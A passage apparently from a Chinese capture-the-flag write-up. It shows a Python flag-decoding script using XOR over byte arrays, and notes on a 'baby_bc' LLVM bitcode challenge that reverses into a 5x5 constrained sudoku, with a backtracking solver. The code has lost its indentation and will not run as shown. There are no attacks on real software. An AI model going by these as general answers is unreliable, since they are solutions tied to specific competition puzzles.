0x00, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x35, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x39, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x3B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3D, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3E, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x3F, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x4A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x51, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x55, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x5A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5B, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x5D, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x5E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x67, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x69, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x6E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6F, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x71, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x74, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x75, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x79, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x7B, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x7C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x7D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7E, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x82, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x85, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x86, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x87, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x89, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x8B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x8C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8D, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8E, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x8F, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x91, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x92, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x93, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x98, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x99, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x9A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x9B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9C, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9D, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x9E, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x9F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xA0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA1, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xA3, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xA5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA6, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA7, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xA8, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xA9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xAA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAB, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAC, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xAD, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xAE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xAF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB1, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xB2, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xB3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xB4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB5, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB6, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xB7, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xB9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBA, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBB, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xBC, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xBD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xBE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBF, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xC1, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC4, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC5, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xC6, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC9, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCA, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xCB, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xCC, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xCD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCE, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xD0, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xD1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xD2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD3, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xD5, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xD6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xD7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD8, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD9, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xDA, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xDB, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xDC, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDD, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDE, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xDF, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xE1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE2, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE3, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xE6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE7, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xEA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xEB, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEC, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xED, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xEE, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xEF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF1, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xF3, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xF5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF6, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF7, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xF9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xFA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFB, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xFD, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xFE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]

a = 0x5F53055504525E54
b = 0x3025156540750
c = 0x57

flag_str = ''

for _ in range(8):
i = a % 256
a //= 256
flag_str += chr(i^0x66)

for _ in range(8):
i = b % 256
b //= 256
flag_str += chr(i^0x66)

flag_str += chr(ord('W')^0x66)
print(flag_str)

def f(n):
if n == 1:
return 2
else:
result = 2 * f(n-1)
ans = 2 ** ( 2 * n -3 )
ans += result
return ans

tmp = [2, 6, 3, 4, 0, 2, 12, 5]

chars = [
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x66, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xA0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x36, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x21, 0x3D,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA7, 0x49, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0xAC, 0x43, 0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0xBE, 0xB5, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00,
0x61, 0xDC, 0x47, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x0F,
0x6C, 0x01, 0x00, 0x00, 0x00, 0x00, 0x32, 0xC4, 0x62, 0x02,
0x00, 0x00, 0x00, 0x00, 0x99, 0xE2, 0xAC, 0x04, 0x00, 0x00,
0x00, 0x00, 0x2A, 0xC9, 0xFB, 0x10, 0x00, 0x00, 0x00, 0x00,
0xFD, 0xCD, 0x9E, 0x32, 0x00, 0x00, 0x00, 0x00, 0x70, 0x74,
0x0D, 0x37, 0x00, 0x00, 0x00, 0x00
]

num = 0 ; sum = 0
for i in chars:
if num == 8:
num = 0
sum %= 8
print(flag_str[tmp[sum-1]],end='')
sum = 0
sum += i * (256 ** num)
num += 1
else:
print()

baby_bc

bc全称bitcode,是一种中间语言。资料链接如下:

https://blog.csdn.net/chqj_163/article/details/90238350

利用llvm可以反编译源码或者直接编译成可执行程序。这里我做这道题的时候是队友直接给我的编译好的可执行文件。

IDA一条龙发现,逻辑十分简单,就是一个5x5的数独,三张表,一张表是地图,一张是每一行内的自定义约束规则,一张是每一列内的自定义约束规则,可以手算可以写脚本,5x5其实直接手算就行.

解数独脚本如下:(注意程序中有 一个输入检验函数要求初始地图已经给出的数据的位置 输入为 0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
def print_grid(arr):
for i in range(5):
for j in range(5):
# 注意,在py3.x中,print函数默认都有换行
print(arr[i][j], end="")
print()

# 找出目前没有被赋值的位置,若全部都被填满,则返回False
def find_empty_location(arr, l):
for row in range(5):
for col in range(5):
if arr[row][col] == 0:
l[0] = row
l[1] = col
# print("empty: row="+str(row)+" col="+str(col))
return True
return False

# 找出num在该arr的row行是否出现过
def used_in_row(arr, row, num):
for i in range(5):
if arr[row][i] == num:
return True
return False

# 找出num在该arr的col列是否出现过
def used_in_col(arr, col, num):
for i in range(5):
if arr[i][col] == num:
return True
return False

def check_location_is_safe(arr, row, col, num):
return not used_in_row(arr, row, num) and not used_in_col(arr, col, num)

def solve_sudoku(arr):
# 当前搜索的第几行、第几列
l = [0, 0]
# 找出还未被填充的位置
if not find_empty_location(arr, l):
return True
# 未被填充的位置,赋值给row,col
row = l[0]
col = l[1]

for num in range(1, 6):
if check_location_is_safe(arr, row, col, num):
arr[row][col] = num
#print_grid(arr)
if solve_sudoku(arr):
row_123 = [[0x00, 0x00, 0x00, 0x01],
[0x01, 0x00, 0x00, 0x00],
[0x02, 0x00, 0x00, 0x01],
[0x00, 0x00, 0x00, 0x00],
[0x01, 0x00, 0x01, 0x00]]
col_123 = [[0x00, 0x00, 0x02, 0x00, 0x02],
[0x00, 0x00, 0x00, 0x00, 0x00],
[0x00, 0x00, 0x00, 0x01, 0x00],
[0x00, 0x01, 0x00, 0x00, 0x01]]
flag = 1
for i in range(20):
if row_123[i//4][i%4] == 1:
if arr[i//4][i%4] < arr[i//4][i%4+1]:
flag = 0
break
elif row_123[i//4][i%4] == 2:
if arr[i//4][i%4] > arr[i//4][i%4+1]:
flag = 0
break
else:
pass

if col_123[i//5][i%5] == 1:
if arr[i//5][i%5] > arr[i//5+1][i%5]:
flag = 0
break
elif col_123[i//5][i%5] == 2:
if arr[i//5][i%5] < arr[i//5+1][i%5]:
flag = 0
break
else:
pass

if flag == 1:
print_grid(grid)
print()
print()
# 若当前num导致未来并没有结果,则当前所填充的数无效,置0后选下一个数测试
arr[row][col] = 0


return False


if __name__ == "__main__":
#grid = [[0 for x in range(5)] for y in range(5)]
grid = [[ 0, 0, 0, 0,0],
[0, 0, 0, 0, 0],
[0, 0, 4, 0, 0],
[0, 0, 0, 3, 0],
[0,0, 0, 0, 0]]
solve_sudoku(grid)

HMI

敬请期待2333

Web(请点击跳转)

隐藏